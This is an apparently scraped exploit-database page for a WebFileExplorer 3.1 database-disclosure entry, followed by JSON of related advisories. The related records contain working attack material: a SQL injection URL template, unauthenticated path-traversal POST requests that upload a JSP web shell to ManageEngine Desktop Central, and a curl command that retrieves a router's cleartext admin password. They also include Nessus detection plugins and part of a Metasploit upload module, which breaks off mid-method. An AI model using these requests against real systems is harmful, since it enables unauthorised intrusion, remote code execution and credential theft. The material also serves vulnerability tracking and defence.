Search...

WebFileExplorer 3.1 (DB.MDB) Database Disclosure Vulnerability

2009-04-08T00:00:00

ID 1337DAY-ID-5006
Type zdt
Reporter ByALBAYX
Modified 2009-04-08T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            ==============================================================
WebFileExplorer 3.1 (DB.MDB) Database Disclosure Vulnerability
==============================================================



@~~=Contry   : Turkish

@[email protected]
@~~=Script   :WebFileExplorer V3.1 Released

@~~=S.Site   :http://www.webfileexplorer.com

@~~=Demo     :http://www.webfileexplorer.com/demo.htm
@[email protected]



#  0day.today [2018-01-08]  #

JSON Vulners Source

Initial Source

{"hash": "d2c50fb0ce547983017e9a6d77c1fad0607f727565582e12376510459dc00a3e", "id": "1337DAY-ID-5006", "lastseen": "2018-01-08T23:04:34", "viewCount": 2, "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "00157601768b634735774d15ccd18f9e", "key": "description"}, {"hash": "ff6a1c096be04979c996d239d8fc4e39", "key": "href"}, {"hash": "003bae46353e255645499f61bb3f06f2", "key": "modified"}, {"hash": "003bae46353e255645499f61bb3f06f2", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "acb0aa8e85c07775f5524e0768e586b8", "key": "reporter"}, {"hash": "393218b1e8374719ac5b65c1878724b0", "key": "sourceData"}, {"hash": "881d76c615bcdd37e4ce931528bbbbb8", "key": "sourceHref"}, {"hash": "0d4dbcfa68fc466de6b34454d9355604", "key": "title"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}], "bulletinFamily": "exploit", "cvss": {"score": 0.0, "vector": "NONE"}, "edition": 2, "enchantments": {"score": {"value": 6.4, "vector": "NONE", "modified": "2018-01-08T23:04:34"}, "dependencies": {"references": [{"type": "zdt", "idList": ["1337DAY-ID-27288", "1337DAY-ID-22570", "1337DAY-ID-21060"]}, {"type": "zdi", "idList": ["ZDI-15-163", "ZDI-12-163"]}, {"type": "nessus", "idList": ["MANAGEENGINE_DESKTOP_CENTRAL_90055_RCE_SAFE.NASL", "WD_MY_NET_PASSWORD_DISCLOSURE.NASL"]}, {"type": "cve", "idList": ["CVE-2014-5006", "CVE-2013-5006"]}, {"type": "exploitdb", "idList": ["EDB-ID:34594", "EDB-ID:34518", "EDB-ID:27288"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310105084", "OPENVAS:1361412562310803731"]}, {"type": "seebug", "idList": ["SSV:87216", "SSV:80902"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:128108", "PACKETSTORM:122640"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:13199", "SECURITYVULNS:DOC:29702"]}], "modified": "2018-01-08T23:04:34"}, "vulnersScore": 6.4}, "type": "zdt", "sourceHref": "https://0day.today/exploit/5006", "description": "Exploit for unknown platform in category web applications", "title": "WebFileExplorer 3.1 (DB.MDB) Database Disclosure Vulnerability", "history": [{"bulletin": {"hash": "455f7aa311612e136b2cbcfda95049a49c4797e3c4e5d942140121cc1c9ccc03", "id": "1337DAY-ID-5006", "lastseen": "2016-04-20T02:06:02", "enchantments": {"score": {"value": 1.8, "modified": "2016-04-20T02:06:02"}}, "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "0ef0856abfe19cb3db3275dbd211f481", "key": "sourceHref"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "78a2285b61a98289473d5d6e265b39f7", "key": "sourceData"}, {"hash": "aa13c2789b1e61c7dabe0fade490db78", "key": "href"}, {"hash": "003bae46353e255645499f61bb3f06f2", "key": "modified"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "acb0aa8e85c07775f5524e0768e586b8", "key": "reporter"}, {"hash": "003bae46353e255645499f61bb3f06f2", "key": "published"}, {"hash": "00157601768b634735774d15ccd18f9e", "key": "description"}, {"hash": "0d4dbcfa68fc466de6b34454d9355604", "key": "title"}], "bulletinFamily": "exploit", "history": [], "edition": 1, "type": "zdt", "sourceHref": "http://0day.today/exploit/5006", "description": "Exploit for unknown platform in category web applications", "viewCount": 1, "title": "WebFileExplorer 3.1 (DB.MDB) Database Disclosure Vulnerability", "cvss": {"score": 0.0, "vector": "NONE"}, "objectVersion": "1.0", "cvelist": [], "sourceData": "==============================================================\r\nWebFileExplorer 3.1 (DB.MDB) Database Disclosure Vulnerability\r\n==============================================================\r\n\r\n\r\n\r\n@~~=Contry : Turkish\r\n\r\n@~~=======================================~~@\r\n@~~=Script :WebFileExplorer V3.1 Released\r\n\r\n@~~=S.Site :http://www.webfileexplorer.com\r\n\r\n@~~=Demo :http://www.webfileexplorer.com/demo.htm\r\n@~~=======================================~~@\r\n\r\n\r\n\n# 0day.today [2016-04-20] #", "published": "2009-04-08T00:00:00", "references": [], "reporter": "ByALBAYX", "modified": "2009-04-08T00:00:00", "href": "http://0day.today/exploit/description/5006"}, "lastseen": "2016-04-20T02:06:02", "edition": 1, "differentElements": ["sourceHref", "sourceData", "href"]}], "objectVersion": "1.3", "cvelist": [], "sourceData": "==============================================================\r\nWebFileExplorer 3.1 (DB.MDB) Database Disclosure Vulnerability\r\n==============================================================\r\n\r\n\r\n\r\n@~~=Contry : Turkish\r\n\r\n@[email\u00a0protected]\r\n@~~=Script :WebFileExplorer V3.1 Released\r\n\r\n@~~=S.Site :http://www.webfileexplorer.com\r\n\r\n@~~=Demo :http://www.webfileexplorer.com/demo.htm\r\n@[email\u00a0protected]\r\n\r\n\r\n\n# 0day.today [2018-01-08] #", "published": "2009-04-08T00:00:00", "references": [], "reporter": "ByALBAYX", "modified": "2009-04-08T00:00:00", "href": "https://0day.today/exploit/description/5006"}

{"cve": [{"lastseen": "2019-05-29T18:15:33", "bulletinFamily": "NVD", "description": "Brave Browser before 0.13.0 allows a tab to close itself even if the tab was not opened by a script, resulting in denial of service.", "modified": "2018-05-10T13:28:00", "id": "CVE-2016-10718", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-10718", "published": "2018-04-04T02:29:00", "title": "CVE-2016-10718", "type": "cve", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2019-05-29T18:13:47", "bulletinFamily": "NVD", "description": "Directory traversal vulnerability in ZOHO ManageEngine Desktop Central (DC) before 9 build 90055 allows remote attackers to execute arbitrary code via a .. (dot dot) in the fileName parameter to mdm/mdmLogUploader.", "modified": "2014-10-24T14:12:00", "id": "CVE-2014-5006", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-5006", "published": "2014-10-21T15:55:00", "title": "CVE-2014-5006", "type": "cve", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:13:05", "bulletinFamily": "NVD", "description": "main_internet.php on the Western Digital My Net N600 and N750 with firmware 1.03.12 and 1.04.16, and the N900 and N900C with firmware 1.05.12, 1.06.18, and 1.06.28, allows remote attackers to discover the cleartext administrative password by reading the \"var pass=\" line within the HTML source code.", "modified": "2017-08-29T01:33:00", "id": "CVE-2013-5006", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-5006", "published": "2013-07-31T13:20:00", "title": "CVE-2013-5006", "type": "cve", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}], "zdt": [{"lastseen": "2018-01-02T01:08:38", "bulletinFamily": "exploit", "description": "Exploit for php platform in category web applications", "modified": "2017-03-11T00:00:00", "published": "2017-03-11T00:00:00", "href": "https://0day.today/exploit/description/27288", "id": "1337DAY-ID-27288", "type": "zdt", "title": "Travel Tours Script 2.0 - SQL Injection Vulnerability", "sourceData": "# # # # # \r\n# Exploit Title: Travel Tours Script v2.0 - SQL Injection\r\n# Google Dork: N/A\r\n# Date: 11.03.2017\r\n# Vendor Homepage: https://www.phpjabbers.com/\r\n# Software: https://www.phpjabbers.com/travel-tours-script/\r\n# Demo: http://demo.phpjabbers.com/index.php?demo=vpl&front=1&lid=1\r\n# Version: 2.0\r\n# Tested on: Win7 x64, Kali Linux x64\r\n# # # # # \r\n# Exploit Author: Ihsan Sencan\r\n# Author Web: http://ihsan.net\r\n# Author Mail: ihsan[@]ihsan[.]net\r\n# # # # #\r\n# SQL Injection/Exploit :\r\n# http://localhost/[PATH]/front.php?controller=pjListings&action=pjActionIndex&sortby=stars&direction=[SQL]&listing_search=1&type=[SQL]&rating_from=[SQL]&rating_to=[SQL]&price_from=[SQL]&price_to=[SQL]\r\n# Etc..\r\n# # # # #\n\n# 0day.today [2018-01-01] #", "sourceHref": "https://0day.today/exploit/27288", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-01-10T15:29:58", "bulletinFamily": "exploit", "description": "ManageEngine Desktop Central suffers from code execution and remote shell upload vulnerabilities.", "modified": "2014-09-01T00:00:00", "published": "2014-09-01T00:00:00", "id": "1337DAY-ID-22570", "href": "https://0day.today/exploit/description/22570", "type": "zdt", "title": "ManageEngine Desktop Central - Arbitrary File Upload / RCE Vulnerabilities", "sourceData": "Arbitrary file upload / remote code execution in ManageEngine Desktop Central / Desktop Central MSP\r\nDiscovered by Pedro Ribeiro Agile Information Security\r\n=================================================================================\r\n \r\nBackground on the affected product:\r\n\"Desktop Central is an integrated desktop & mobile device management\r\nsoftware that helps in managing the servers, laptops, desktops,\r\nsmartphones and tablets from a central point. It automates your\r\nregular desktop management routines like installing patches,\r\ndistributing software, managing your IT Assets, managing software\r\nlicenses, monitoring software usage statistics, managing USB device\r\nusage, taking control of remote desktops, and more.\"\r\n \r\nThere are several vulnerable servers are out there if you know the\r\nGoogle dorks. Quoting the author of the Internet Census 2012: \"As a\r\nrule of thumb, if you believe that \"nobody would connect that to the\r\nInternet, really nobody\", there are at least 1000 people who did.\"\r\nThese vulnerabilities can be abused to achieve remote code execution\r\nas SYSTEM in Windows. I've updated the desktopcentral_file_upload\r\nMetasploit module to use the new statusUpdate technique. Needless to\r\nsay, owning a Desktop Central box will give you control of all the\r\ncomputers and smartphones it manages.\r\n \r\nTechnical details:\r\n#1\r\nVulnerability: Remote code execution as SYSTEM via file upload (unauthenticated)\r\nConstraints: none; no authentication or any other information needed\r\n \r\na)\r\nCVE-2014-5005\r\nAffected versions: all versions from v7 to v9 build 90054\r\nFix: Upgrade to DC v9 build 90055\r\nPOST /statusUpdate?actionToCall=LFU&customerId=1337&fileName=../../../../../../shell.jsp&configDataID=1\r\n<... your favourite jsp shell here ...>\r\n \r\nb)\r\nCVE-2014-5006\r\nAffected versions: all versions from v8 to v9 build 90054\r\nFix: Upgrade to DC v9 build 90055\r\nPOST /mdm/mdmLogUploader?filename=..\\\\..\\\\..\\webapps\\\\DesktopCentral\\\\shell.jsp\r\n<... your favourite jsp shell here ...>\r\n \r\n \r\n#2\r\nCVE-2014-5007\r\nVulnerability: Remote code execution as SYSTEM via file upload (unauthenticated)\r\nConstraints: no authentication needed; need to know valid\r\ncomputerName, domainName and customerId\r\nAffected versions: all versions from v7 to v9 build 90054\r\nFix: Upgrade to DC v9 build 90055\r\nNotes: This was previously discovered as CVE-2013-7390 / OSVDB-10008\r\nby Thomas Hibbert, and was \"fixed\" in 2013-11-09. The fix is\r\nincomplete and it is still possible to upload a shell with a valid\r\ncomputerName, domainName and customerId.\r\n \r\nPOST /agentLogUploader?computerName=whatever1&domainName=whatever2&customerId=1337&filename=..\\\\..\\\\..\\\\..\\\\webapps\\\\DesktopCentral\\\\shell.jsp\r\n<... your favourite jsp shell here ...>\n\n# 0day.today [2018-01-10] #", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://0day.today/exploit/22570"}, {"lastseen": "2018-03-19T02:09:21", "bulletinFamily": "exploit", "description": "Exploit for hardware platform in category web applications", "modified": "2013-08-03T00:00:00", "published": "2013-08-03T00:00:00", "id": "1337DAY-ID-21060", "href": "https://0day.today/exploit/description/21060", "type": "zdt", "title": "Western Digital My Net Wireless Routers - Password Disclosure", "sourceData": "Vulnerable Systems:\r\nWestern Digital My Net Series Wireless Routers:\r\nN600 Firmware 1.03.12\r\nN600 Firmware 1.04.16\r\n \r\nN750 Firmware 1.03.12\r\nN750 Firmware 1.04.16\r\n \r\nN900 Firmware 1.05.12\r\nN900 Firmware 1.06.18\r\nN900 Firmware 1.06.28\r\n \r\nN900C Firmware 1.05.12\r\nN900C Firmware 1.06.18\r\nN900C Firmware 1.06.28\r\n \r\nCVE 2013-5006\r\nCWE-256 Plaintext Storage of a Password\r\nCVSS Base Score 4.3\r\nCVSS Impact Subscore 2.9\r\nCvss Expoit Score 8.6\r\n(AV:N/AC:M/Au:N/C:P/I:N/A:N/E:POC/RL:U/RC:UR/CDP:H/TD:H/CR:H/IR:H/AR:H)\r\n \r\nProof of concept:\r\ncurl -s http://<IP>:8080/main_internet.php? | egrep -i 'var pass'\r\n \r\nwhich will give an output similar to this ex:\r\nvar pass=\"\";\r\n \r\nDetails:\r\nBy sending a specially crafted command to the affected routers, the clear text password for the admin account can be extracted, with no authentication required to access the page where it is stored.\r\n \r\nDuring the initial setup of these four routers with the affected firmware, the admin password is stored in clear text on the main_internet.php? source code page as the value for 'var pass'. For this bug to exploitable from a remote network attack, UPnP and remote administrative access (port 8080 is set by default) must be enabled.\r\n \r\nThe vendor has not responded to any inquiries concerning the bug.\r\n \r\nExternal Sources:\r\nOSVDB - http://www.osvdb.org/show/osvdb/95519\r\nCVE-Mitre - http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5006\r\nIBM xforce - http://xforce.iss.net/xforce/xfdb/85903\r\nBugtraq/SecList - http://www.securityfocus.com/archive/1/527433\r\nSecurity Database - http://www.security-database.com/detail.php?alert=CVE-2013-5006\r\n \r\nVendor's Network Router Product Pages:\r\nhttp://www.wdc.com/en/products/network/routers/\r\nhttp://support.wdc.com/download/notes/My_Net_N900C_FW_Release_Notes_1.07.16.pdf?v=9564\r\nhttp://support.wdc.com/download/notes/My_Net_N900_FW_Release_Notes_1.07.16.pdf?v=7436\r\nhttp://support.wdc.com/download/notes/My_Net_N750_FW_Release_Notes_1_04_16.pdf?v=6879\r\nhttp://support.wdc.com/download/notes/My_Net_N600_FW_Release_Notes_1_04_16.pdf?v=4950\r\n \r\nAdditional Notes/Fixes/Workarounds:\r\n \r\nFirmware notes: N900 and N900C with firmware 1.07.16 released on 05/2013 fixes the bug. It is advised that users with the N900 or N900C upgrade to 1.07.16. Earlier firmware releases of 1.02.02, 1.03.11 and 1.04.08 are unaffected.\r\n \r\nN600 and N750 with the earlier firmware 1.01.04 and 1.01.20 are unaffected by this bug. Firmware 1.02.08 was not tested. The 'workaround' for these two model routers, which will only stop network side attacks, is for the end user to disable remote administrative access capabilities.\r\n \r\nDiscovered - 07-02-2013\r\nUpdated - 07-31-2013\r\nResearch Contact - K Lovett\r\nAffiliation - SUSnet\n\n# 0day.today [2018-03-19] #", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": "https://0day.today/exploit/21060"}], "zdi": [{"lastseen": "2016-11-09T00:18:00", "bulletinFamily": "info", "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of ManageEngine Desktop Central MSP. Authentication is not required to exploit this vulnerability.\n\nThe specific flaw exists within the MDMLogUploaderServlet servlet. The issue lies in the failure to sanitize the filenames uploaded to the servlet. An attacker can leverage this vulnerability to execute code under the context of SYSTEM.", "modified": "2015-11-09T00:00:00", "published": "2015-04-29T00:00:00", "href": "http://www.zerodayinitiative.com/advisories/ZDI-15-163", "id": "ZDI-15-163", "title": "ManageEngine Desktop Central MSP MDMLogUploaderServlet filename File Upload Remote Code Execution Vulnerability", "type": "zdi", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "nessus": [{"lastseen": "2019-11-23T11:32:16", "bulletinFamily": "scanner", "description": "The version of ManageEngine Desktop Central running on the remote host\nis affected by the following file upload vulnerabilities that allow\nthe execution of arbitrary code by a remote attacker :\n\n - A failure to validate the ", "modified": "2019-11-02T00:00:00", "id": "MANAGEENGINE_DESKTOP_CENTRAL_90055_RCE_SAFE.NASL", "href": "https://www.tenable.com/plugins/nessus/82079", "published": "2015-03-25T00:00:00", "title": "ManageEngine Desktop Central Arbitrary File Upload and RCE (Safe Check)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(82079);\n script_version(\"1.7\");\n script_cvs_date(\"Date: 2019/11/22\");\n\n script_cve_id(\"CVE-2014-5005\", \"CVE-2014-5006\", \"CVE-2014-5007\");\n script_bugtraq_id(69491, 69493, 69494);\n script_xref(name:\"EDB-ID\", value:\"34594\");\n\n script_name(english:\"ManageEngine Desktop Central Arbitrary File Upload and RCE (Safe Check)\");\n script_summary(english:\"Checks the version of ManageEngine Desktop Central.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server contains a Java web application that is affected\nby remote code execution vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of ManageEngine Desktop Central running on the remote host\nis affected by the following file upload vulnerabilities that allow\nthe execution of arbitrary code by a remote attacker :\n\n - A failure to validate the 'filename' parameter of the\n 'statusUpdate' servlet when performing a 'LFU' action.\n (CVE-2014-5005)\n\n - A failure to validate the 'filename' parameter of the\n 'mdmLogUploader' servlet. (CVE-2014-5006)\n\n - A failure to validate the 'filename' parameter of the\n 'agentLogUploader' servlet. This flaw was previously\n identified by CVE-2013-7390 and reported as fixed in\n version 8 build 80293; however, the fix was incomplete,\n and a method for bypassing it was discovered and\n re-reported. (CVE-2014-5007)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.zerodayinitiative.com/advisories/ZDI-15-006/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://seclists.org/fulldisclosure/2014/Aug/88\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to ManageEngine Desktop Central 9 build 90055 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:ND\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2014-5006\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"ManageEngine Desktop Central 9.0.0 File Upload\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'ManageEngine Desktop Central StatusUpdate Arbitrary File Upload');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/08/31\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/08/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/03/25\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:zohocorp:manageengine_desktop_central\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2015-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"manageengine_desktop_central_detect.nbin\");\n script_require_keys(\"installed_sw/ManageEngine Desktop Central\");\n script_require_ports(\"Services/www\", 8020, 8383, 8040);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"webapp_func.inc\");\n\nappname = \"ManageEngine Desktop Central\";\nget_install_count(app_name:appname, exit_if_zero:TRUE);\n\nport = get_http_port(default:8020);\n\ninstall = get_single_install(\n app_name : appname,\n port : port,\n exit_if_unknown_ver : TRUE\n);\n\ndir = install[\"path\"];\nversion = install[\"version\"];\nbuild = install[\"build\"];\nismsp = install[\"MSP\"];\nrep_version = version;\nif(build != UNKNOWN_VER)\n rep_version += \" Build \"+build;\ninstall_url = build_url(port:port, qs:dir);\n\n# 7 - 9 build 90055\nif (version !~ \"^[7-9](\\.|$)\")\n audit(AUDIT_WEB_APP_NOT_AFFECTED, appname, install_url, rep_version);\n\nif (version =~ \"^9(\\.|$)\" && build == UNKNOWN_VER)\n exit(0, \"The build number of \"+appname+\" version \" +rep_version+ \" listening at \" +install_url+ \" could not be determined.\");\n\nif (int(build) < 90055)\n{\n if (report_verbosity > 0)\n {\n report =\n '\\n URL : ' + install_url +\n '\\n Installed version : ' + rep_version +\n '\\n Fixed version : 9 Build 90055' +\n '\\n';\n security_hole(port:port, extra:report);\n }\n else security_hole(port);\n exit(0);\n}\nelse audit(AUDIT_WEB_APP_NOT_AFFECTED, appname, install_url, rep_version);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-11-03T12:38:40", "bulletinFamily": "scanner", "description": "The web server for the Western Digital My Net router identified is\naffected by an information disclosure vulnerability. The admin password\nis stored in plaintext as the value for ", "modified": "2019-11-02T00:00:00", "id": "WD_MY_NET_PASSWORD_DISCLOSURE.NASL", "href": "https://www.tenable.com/plugins/nessus/69370", "published": "2013-08-15T00:00:00", "title": "Western Digital My Net Router main_internet.php Admin Credential Disclosure", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(69370);\n script_version(\"1.6\");\n script_cvs_date(\"Date: 2018/11/15 20:50:19\");\n\n script_cve_id(\"CVE-2013-5006\");\n script_bugtraq_id(61361);\n script_xref(name:\"EDB-ID\", value:\"27288\");\n\n script_name(english:\"Western Digital My Net Router main_internet.php Admin Credential Disclosure\");\n script_summary(english:\"Tries to retrieve admin credentials\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\n\"The remote web server contains an application that is affected by an\ninformation disclosure vulnerability.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"The web server for the Western Digital My Net router identified is\naffected by an information disclosure vulnerability. The admin password\nis stored in plaintext as the value for 'var pass'. This can be found\nin the source code for the 'main_internet.php' page. An\nunauthenticated, remote attacker could gain access to the login\ncredentials by sending a request to an affected device.\n\nNote that in order for this issue to be exploited, UPnP and remote\nadministrative access must be enabled.\"\n );\n script_set_attribute(attribute:\"see_also\", value:\"https://seclists.org/bugtraq/2013/Jul/132\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.wdc.com/wdproducts/updates/?family=wdfmynetn900\");\n script_set_attribute(\n attribute:\"solution\",\n value:\n\"Users of N900 and N900C devices should update the firmware to version\n1.07.16 or later. For other affected devices, please refer to the\nvendor for upgrade options. Some sources suggest disabling remote\nadministrative access and disable UPnP as possible mitigation steps in\nthe event no upgrade option is available.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No exploit is required\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/07/19\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/05/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/08/15\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:wdc:mynet_firmware\");\n script_set_attribute(attribute:\"exploited_by_nessus\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2013-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"http_version.nasl\");\n script_require_ports(\"Services/www\", 8080);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"webapp_func.inc\");\n\nport = get_http_port(default:8080, embedded:TRUE);\nurl = \"/main_internet.php\";\n\nres = http_send_recv3(\n method : \"GET\",\n port : port,\n item : url,\n exit_on_fail : TRUE\n);\n\n# Does it look like My Net\nif (\n \"<title>WESTERN DIGITAL, INC. | WIRELESS ROUTER | HOME\" >!< res[2] &&\n 'LoginSubmit: function' >!< res[2]\n) audit(AUDIT_NOT_DETECT, \"A Western Digital My Net router\", port);\n\n\nif ('var pass=\"' >< res[2])\n{\n # Extract Admin password\n pass = \"\";\n pat = 'var pass=\"([^\"]*)\"';\n match = eregmatch(pattern:pat, string:res[2]);\n if (!isnull(match))\n {\n pass = match[1];\n # Mask all but first and last character\n pass = pass[0] + crap(data:\"*\", length:6) + pass[strlen(pass)-1];\n }\n\n if (report_verbosity > 0)\n {\n header = 'Nessus was able to verify the issue with the following URL';\n trailer = 'And was able to determine the admin password is : \"'+pass+'\".' +\n '\\n\\nNote : All but the first and last characters have been masked.';\n\n report = get_vuln_report(\n items : url,\n port : port,\n header : header,\n trailer : trailer\n );\n security_warning(port:port, extra:report);\n }\n else security_warning(port);\n exit(0);\n}\naudit(AUDIT_WEB_APP_NOT_AFFECTED, \"Western Digital My Net\", build_url(port:port, qs:url));\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}], "exploitdb": [{"lastseen": "2016-02-03T23:32:14", "bulletinFamily": "exploit", "description": "ManageEngine Desktop Central StatusUpdate Arbitrary File Upload. CVE-2014-5005. Remote exploit for windows platform", "modified": "2014-09-09T00:00:00", "published": "2014-09-09T00:00:00", "id": "EDB-ID:34594", "href": "https://www.exploit-db.com/exploits/34594/", "type": "exploitdb", "title": "ManageEngine Desktop Central StatusUpdate Arbitrary File Upload", "sourceData": "##\r\n# This module requires Metasploit: http//metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n Rank = ExcellentRanking\r\n\r\n include Msf::Exploit::Remote::HttpClient\r\n include Msf::Exploit::EXE\r\n include Msf::Exploit::FileDropper\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'ManageEngine Desktop Central StatusUpdate Arbitrary File Upload',\r\n 'Description' => %q{\r\n This module exploits an arbitrary file upload vulnerability in ManageEngine DesktopCentral\r\n v7 to v9 build 90054 (including the MSP versions).\r\n A malicious user can upload a JSP file into the web root without authentication, leading to\r\n arbitrary code execution as SYSTEM. Some early builds of version 7 are not exploitable as\r\n they do not ship with a bundled Java compiler.\r\n },\r\n 'Author' =>\r\n [\r\n 'Pedro Ribeiro <pedrib[at]gmail.com>' # Vulnerability discovery and Metasploit module\r\n ],\r\n 'License' => MSF_LICENSE,\r\n 'References' =>\r\n [\r\n ['CVE', '2014-5005'],\r\n ['OSVDB', '110643'],\r\n ['URL', 'http://seclists.org/fulldisclosure/2014/Aug/88'],\r\n ['URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/me_dc9_file_upload.txt']\r\n ],\r\n 'Platform' => 'win',\r\n 'Arch' => ARCH_X86,\r\n 'Targets' =>\r\n [\r\n [ 'Desktop Central v7 to v9 build 90054 / Windows', {} ]\r\n ],\r\n 'Privileged' => true,\r\n 'DefaultTarget' => 0,\r\n 'DisclosureDate' => 'Aug 31 2014'\r\n ))\r\n\r\n register_options([Opt::RPORT(8020)], self.class)\r\n end\r\n\r\n\r\n # Test for Desktop Central\r\n def check\r\n res = send_request_cgi({\r\n 'uri' => normalize_uri(\"configurations.do\"),\r\n 'method' => 'GET'\r\n })\r\n\r\n if res && res.code == 200\r\n build = nil\r\n\r\n if res.body.to_s =~ /ManageEngine Desktop Central 7/ ||\r\n res.body.to_s =~ /ManageEngine Desktop Central MSP 7/ # DC v7\r\n\r\n print_status(\"#{peer} - Detected Desktop Central v7\")\r\n elsif res.body.to_s =~ /ManageEngine Desktop Central 8/ ||\r\n res.body.to_s =~ /ManageEngine Desktop Central MSP 8/\r\n\r\n if res.body.to_s =~ /id=\"buildNum\" value=\"([0-9]+)\"\\/>/ # DC v8 (later versions)\r\n build = $1\r\n print_status(\"#{peer} - Detected Desktop Central v8 #{build}\")\r\n else # DC v8 (earlier versions)\r\n print_status(\"#{peer} - Detected Desktop Central v8\")\r\n end\r\n elsif res.body.to_s =~ /id=\"buildNum\" value=\"([0-9]+)\"\\/>/ # DC v9 (and higher?)\r\n build = $1\r\n end\r\n\r\n if build.nil?\r\n return Exploit::CheckCode::Unknown\r\n elsif Gem::Version.new(build) < Gem::Version.new(\"90055\")\r\n return Exploit::CheckCode::Appears\r\n else\r\n return Exploit::CheckCode::Safe\r\n end\r\n end\r\n\r\n Exploit::CheckCode::Unknown\r\n end\r\n\r\n def exploit\r\n print_status(\"#{peer} - Uploading JSP to execute the payload\")\r\n\r\n exe = payload.encoded_exe\r\n exe_filename = 